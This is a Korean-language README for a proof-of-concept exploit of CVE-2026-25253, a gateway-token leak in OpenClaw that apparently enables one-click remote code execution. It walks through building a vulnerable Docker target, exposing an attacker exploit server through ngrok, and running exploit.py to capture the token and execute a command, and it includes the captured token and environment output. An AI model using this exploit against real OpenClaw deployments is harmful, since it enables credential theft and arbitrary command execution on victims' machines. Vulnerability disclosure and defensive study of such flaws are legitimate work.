
OpenClaw의 CVE-2026-25253에 대한 개념 증명 익스플로잇: 조작된 gatewayUrl이 Control UI 게이트웨이 토큰을 유출하여 무단 게이트웨이 접근과 1-클릭 원격 코드 실행을 가능하게 합니다.
★ CVE-2026-25253 OpenClaw 1-Click 원격 코드 실행 PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : OpenClaw 인증 토큰 유출 취약점
description: OpenClaw(일명 clawdbot 또는 Moltbot)는 v2026.1.29 이전 버전에서 공격자가 조작된 gatewayUrl 쿼리 문자열 값을 Control UI에 제공하여 저장된 게이트웨이 인증 토큰을 유출할 수 있도록 허용합니다. Control UI는 검증이나 사용자 확인 없이 자동으로 WebSocket 연결을 설정합니다. 이는 권한 없는 게이트웨이 접근 및 1-클릭 원격 코드 실행으로 이어질 수 있습니다.
Dockerfile — OpenClaw 취약 환경 빌드templates/ — 익스플로잇에서 사용하는 악성 웹 페이지config.txt — 피해자 환경에서 사용하는 OpenClaw 구성exploit.py — 익스플로잇 서버requirements.txt — PoC 의존성docker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 입력config.txt의 내용 붙여넣기pip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
예시:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
저희는 매월 CVE 및 악성코드 분석을 게시합니다. 관심이 있으시면 아래 링크를 통해 저희 간행물을 확인해 주세요.